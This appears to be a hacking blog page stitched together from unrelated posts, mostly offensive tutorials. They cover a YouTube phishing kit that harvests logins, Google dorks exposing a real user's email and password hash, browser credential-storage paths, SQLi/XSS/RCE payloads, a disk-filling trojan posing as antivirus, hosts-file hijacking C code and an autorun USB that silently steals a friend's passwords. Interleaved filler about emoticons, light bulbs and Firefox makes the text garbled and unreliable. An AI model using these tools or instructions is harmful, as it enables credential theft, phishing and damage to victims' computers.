Web Globe

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmailyoutube,friendster etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.



Download Youtube Phising in HERE


PROCEDURE:

1.once you have downloded youtube fake login page,now extract contents in a folder
2.In that ,find (CTRL+F) ‘http://hackingaday.com’ then change it to your destined URL but don’t forget ‘\’.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term “action=” now change its value to pass.php i.e. action=pass.php
5.Create an id in http://www.110mb.com , because i know about that site quite well.

6.Then upload the contents into a directory

7.For that,after creating an id you should go to file manager and upload all these files.

8.Then just got to youtube.htm and try out whether its working .
After you type in the file , a password file named pass.txt will be created in the same directory.Then you can see what username and password you have entered.

Google Dorks:

Quote:ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e

Quote:ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password

Quote:ext:sql intext:@hotmail.com intext:password

Online hash cracker:
http://md5crack.com/

Ok lets begin:

Lets go to http://www.google.com and paste one of our dorks
 Select one of displayed pages,as you see we now have a bunch of email accounts+ hashes



 I selected a random account
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d

We normallychat with simple alphabets but now you can use colorful alphabets to make chat so interesting.
how beautiful it looks when you will this kind of message to your friends. So now if you like this thing and you wanna start a colorful alphabets emoticon chatting than you wanna use below code for different alphabets mentioned. SO whenever you paste code for any alphabet and you hit enter you will get colorful alphabetslike above. So copy codes from below and start chatting.
Below is the list:
[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J
[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z

The passwords are stored in a secret location in the Registry known as the Protected Storagey�.
The base key of the Protected Storage is located under the following key:
HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider�.
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.


* The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.


* The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.


*
The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
(This filename is SQLite database which contains encrypted passwords and other stuff)


* The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile


*
The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.


*
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.


*
All new versions of Outlook store the passwords in the same Registry key of the account settings.The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.


*
All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]
The account filename is an xml file with .oeaccount extension.


* The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.


* All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]


* Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]


* The passwords are stored in one of the following locations:
1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerServ ice
3. In the Credentials file, with entry named as “Passport.Net\\*�. (Only when the OS is XP or more)


*
The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[Account Name]


*
The passwords are stored in the Credentials file, with entry name begins with WindowsLive:name=.


* The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(�EOptions string value)


* The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager ETS� value.
The value stored in ETS value cannot be recovered back to the original password.


* The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]


* The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords.


* The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners \[ICQ Number]
(MainLocation value)


* The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
(The password hash cannot be recovered back to the original password)


*

* The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]

Tool (for Windows) that can generate a full set of PHP quickly from MySQL Database. Using PHPMaker, you can instantly create Web sites that allow users to view, edit, search, add and delete records on the Web. PHPMaker is designed for high flexibility, numerous options enable you to generate PHP applications that best suits your needs. The generated codes are clean, straightforward and easy-to-customize. PHPMaker can save you tons of time and is suitable for both beginners and experienced develpers alike.

Code:
http://www.hkvstore.com/phpmaker/download.asp

The PHDays 2012 program will include Online HackQuest, a competition for the Internet users that offers participants to try their hands at solving various information security tasks. On the forum’s second day, Online HackQuest participants will have a chance to influence the results of PHDays CTF 2012, an on-site contest.

Rules

For the competition, participants are provided with access to a VPN gateway. After connecting to it, the participants are to identify target systems and detect their vulnerabilities. If exploitation of a vulnerability is successful, the participant gains access to a key (a flag), which should be submitted to the jury via the form on the participant’s personal page. If the flag is valid, the participant gains the corresponding number of points.
All flags are in the MD5 format. The winner is the first participant to gain 100 points (which is the maximum possible amount). Participants who manage to gain more than 100 points are traditionally awarded with individual prizes

Participation Terms

Any Internet user is welcome to participate in the competition. The registration will open on the PHDays 2012 web site after the forum begins. Moreover, the Online HackQuest will also be available for out-of-competition participation during 14 days after PHDays 2012.

Prizes

Positive Technologies (the PHDays organizers) and the sponsors of the forum provide prizes and gifts for the competition.

Technical Details

The participation requires Internet connection and a possibility to establish connection to a VPN gateway via PPTP or IPSec.

More Info http://phdays.com/program/contests/

Create your very own method, its that simple.
learn to brain storm, stop trying to use a method someone else has already made public.

Brain Storm. find something that NO ONE is doing, and work on it. keep it 100% TO YOUR SELF!

I can't stress it enough, STOP PAYING PEOPLE FOR THEIR EBOOKS ABOUT JUNK GET RICH QUICK.
Think about it for a min..
If the method works so well why would someone sell it so damn cheap?

I know damn well id never tell anyone a method i was earning $100k/year for anything lower then say $50,000.00. so why on earth would you think an ebook you can get online for around $10.00-300.00 would ever make you decent money? Come on now.. stop being foolish.

If you don't have a creative mind, well get used to them small check/wire transfers.
And for all you people that were told "you have a creative mind" when you were younger PUT IT TO USE

please don't read this and think its some kind of joke.
its the best info you have read about making money online.

If you can't do this yourself then look for other members here to brainstorm with, start your own group here. Two brains are always better then one.

Now stop reading this post, and start using your head.

Remote File Inclusion (RFI):
A method of uploading a shell by an off-site link.

Local File Inclusion (LFI) AKA Directory traversal attack:
A method of pulling usernames and passwords off a website vulnerable to the exploit of
insufficient security validation / sanitization of user-supplied input file names.

Blind Structured Query Language Injection (blind SQLI):
Method of once again insufficiant security validation and sanitization of user-input.

Basic SQLi
This is the easiest method of SQLi. This method allows you to enter codes such as ' or '1'='1
into the username and password fields to gain access. E.g. you find the admin login on a site
and you may enter the correct username admin and the password as: ' or '1'='1.

Cross Site Scripting (XSS):
A method of injection html/javascript into a website. The can be both persistent attacks, and
non-persistant.


Cross site request forgery (CSRF):
An attack that is commonly sent by e-mail or other means and often tricks a user. Links given to a target may include HTML, something like this:
Code:

And this will be activated through the victims browser and the site will think it was a valid and intentional move.

Public Exploits:
Public exploits are just scripts that people have released for others to use. Such as
this exploit which exploits a webserver
running this program on one of its open ports. I suggest you have a quick look through the
script to see how/why it works. The way of finding which software you target is using is by using Namp or the GUI Zenmap

DNS hijacking:
This is the method or redirecting the domain name to a rouge domain name. This method is used
particually in phishing attacks.

Bruteforcing:
This method is the practise of running a program to keep guessing the password and username of
a site. This method is fastly going out of fashion as the max login attempts are added and even
without this obstical, it can take weeks to gain the correct password. Programs commonly used
for this are hydra and Brutus.

Password Guessing:
Yes, just as it sounds. This is the method of just guessing common passwords such as:

Code:
admin
admin123
321admin123
password
toor
thesitesname

Packet Sniffing:
If you find a site with FTP access, there may be a chance you can use a tool such as
cain and abel to sniff their password and username when
the login. Not a very easy task as the trafic is sometimes encrypted.

RCE (Remote Command Execution):
This is the method of making the server read command that you have entered for it to.
E.g.
Code:
index.php?cmd=whoami
index.php?cmd=net user


Social Enginering:
A common method used to gain information. This can be a long process, but an effective one.
They can patch software, but it will always be people's ignorance that will let you/your target
down.

Cookie poisoning:
This is a method of editing cookies you have already gained, to gain extra privileges. Not a very common method now as of cookies being encrypted, and having to be signed. This exploit can work on some surprising sites, take a look, you may be surprised.

Parameter tampering:
An attack usual done by moderfying values in the url. E.g. changing a value to decrease the amount you have to pay on something.
Code:


In this example, an attacker can modify the “value” information of a specific item, thus lowering its cost.
source: http://www.owasp.org/index.php/Web_Parameter_Tampering

Tamper Data:
A very nifty Firefox addon which is used to modify http/https headers and post parameters.

Admin Auth bypass:
This exploit can be as simple as adding:
Code:
?action=edit
To a URL. This exploit when a server/application allows you to edit by having the valid URL, instead of by cookies. Another method of admin auth bypass is editting the html to proceed even if the password is wrong.

This is the pastebin method to find passwords
Requirements: Patience
1. Go to http://pastebin.com/
2. Go to the search bar and type (example):
Program:firefox Url/Host:http://www.facebook.com login
Just change the Host to other site to find passwords you want!
Ex. Program:firefox Url/Host:http://paypal.com login
BOOM! Thousands of passwords

What is XSS? Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the infected or a specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms. Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password. It will be helpful for understanding XSS , if you have the following prerequisite: Strong Knowledge in HTML,javascript. Basic Knowledge in HTTP client-Server Architecure [optional]Basic Knowledge about server side programming(php,asp,jsp) XSS Attack: Step 1: Finding Vulnerable Website Hackers use google dork for finding the vulnerable sites for instance "?search=" or ".php?q=" . 1337 target specific sites instead of using google search. If you are going to test your own site, you have to check every page in your site for the vulnerability. Step 2: Testing the Vulnerability: First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields. Test 1 : Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the result Now right click on the page and select view source. search for the string "BTS" which we entered in the input field. Note the location where the input is placed. Test 2: Now we are going to check whether the server sanitize our input or not. In order to do this , let us input the Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS . By extending the code with malicious script, a hacker can do steal cookies or deface the site and more. Types of XSS Based on persisting capability: Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent. Persistent XSS: The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page. For Example: Many websites host a support forum where registered users can ask their doubts by posting message , which are stored in the database. Let us imagine , An attacker post a message containing malicious javascript code instead. If the server fail to sanitize the input provided, it results in execution of injected script. The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account. Non-Persistent XSS: Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest. The server embedd the input with the html file and return the file(HTTPResponse) to browser. When the browser executes the HTML file, it also execute the embedded script. This kind of XSS vulnerability frequently occur in search fields. NOTE: In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser. The browser then executes the code

This summary is not available. Please click here to view the post.

Starting tomorrow, buyers will be able to walk into an Apple Store and walk out with a Philips light bulb. Not just any light bulb, though. This one’s special. Very special indeed. Sold exclusively via Apple Stores, the Philips Hue bulbs aren’t just bulbs. See, these bulbs come with a connection to your router, allowing users to personalize lighting levels and schedules. Want a nice, soothing light to kick in around dinner time? No problem. Want blinding light to wake you up of a morning? There’s an app for that! read more HERE

Chapter 1. Inside the Brain
Section 1.1. Hacks 1-12
Hack 1. Find Out How the Brain Works Without Looking Inside
Hack 2. Electroencephalogram: Getting the Big Picture with EEGs
Hack 3. Positron Emission Tomography: Measuring Activity Indirectly with PET
Hack 4. Functional Magnetic Resonance Imaging: The State of the Art
Hack 5. Transcranial Magnetic Stimulation: Turn On and Off Bits of the Brain
Hack 6. Neuropsychology, the 10% Myth, and Why You Use All of Your Brain
Hack 7. Get Acquainted with the Central Nervous System
Hack 8. Tour the Cortex and the Four Lobes
Hack 9. The Neuron
Hack 10. Detect the Effect of Cognitive Function on Cerebral Blood Flow
Hack 11. Why People Don't Work Like Elevator Buttons
Hack 12. Build Your Own Sensory Homunculus

and many more

Klik HERE to Download

Do you suspect that your email account is under attack? Do you want to maintain total security of your email account and make it 100% hack proof? Well, Some times our email account might have got hacked and we may not be aware of that. We may believe that our email account is safe, but in reality our private and confidential information may be falling into the hands of a third person.

Here are some signs of unauthorized activity on an email account.

1. Your new emails are marked as Read even if you’ve not read them.

2. Your emails are moved to Trash or even permanently deleted without your notice.

3. Your emails are being forwarded to a third party email address (check your settings->forwarding).

4. Your secondary email address is changed.

If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.

Additional Security Features in Gmail to ensure the Safety of your Account

Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.

You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.

Steps to be carried out to stop unauthorized activity on your email account

If you feel/suspect that your account is hacked then you must immediately take the actions mentioned below

1. Change your Password

2. Change your security question.

2. Remove any third party email address (if any) to which your account is set to forward emails.

3. Make sure that you can access the email account of your secondary email address.

4. Also change you secondary email password and security question.

This ensures that your account is safe from future attacks. But I strongly recommend that you read the following post to protect your email account from being hacked.

Klik HERE to Download

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

You can download the Trojan along with it’s source code HERE.
How to compile, test and remove the damage?

Compilation:

You can use Borland C++ compiler (or equivalent) to compile the Trojan.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.

5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be

http://abc.x10hosting.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.php

The sample log will be in the following format

79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM

note: abc is a subdomain name, you can change it

Here is the sourcecode of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1?;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

1. Compile the sourcecode using any C/C++ compiler.

2. To test, run the compiled module. It will block the sites that is listed in the source code.

3. Once you run the file block_Site.exe , restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

Download this first :

http://dhani-web.com/download/iepv.zip

http://dhani-web.com/download/mailpv.zip

http://dhani-web.com/download/mspass.zip

http://dhani-web.com/download/passwordfox.zip

http://dhani-web.com/download/pspv.zip

Step:

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

A couple of months ago, I downloaded a beta version of Firefox 3 just to look at the new ideas Mozilla was working on. My intention was to try it for a couple days, then switch back to Firefox 2. I wasn't worried about stability (it's a browser after all -- what's the worst that can happen?). But the beta wasn't compatible with lots of my favorite extensions and who wants to live without them?
As it turns out, I'm still using a prerelease version of Firefox (they're at Release Candidate 1 now) and loving it, even without my beloved add-ons. The improvements Mozilla has made to the browser, while subtle, are so helpful that I didn't want to give them up. Here are five of my favorites.
1. Much Better Performance

If you've used previous versions of Firefox you've likely had this experience, perhaps frequently: you're working away, but gradually become aware that something is horribly wrong with your PC. It's sluggish and apps take forever to load. You open up Task Manager and find that Firefox is chewing up 95 percent of your CPU cycles. Once you kill the browser and start over, you're running fine again.
I can't remember the last time I've had that experience with the Firefox 3 betas. Mozilla developers borrowed some memory management tricks from the Free BSD operating system for the Windows and Linux versions of Firefox. (They say memory management on Macs already worked pretty well.) The effect is clear. The browser is much less likely to commandeer too many system resources. And Firefox's developers worked to make sure that add-ons, notorious memory thieves, don't cause problems either. They've rolled in cycle collectors that help prevent extensions from locking up RAM and not giving it back. They're also distributing tools to third-party developers that will help them build more abstemious add-ons.
2. The "Awesome Bar"

Okay, so the official name is the Location Bar, the field where you enter URLs you want to visit. But beta testers have nicknamed it the Awesome Bar and it is, well, pretty awesome. Enter text in the Location Bar and a dropdown list appears of pages from your browsing history that include that text, not just in the URL, but in the page title or the page's tag (see #4 below). The list even includes Gmail messages that include that word in the subject line. If you've already visited a Web page, there's a good chance it's useful to you. The Location Bar lets you very quickly search that useful subset of the Web.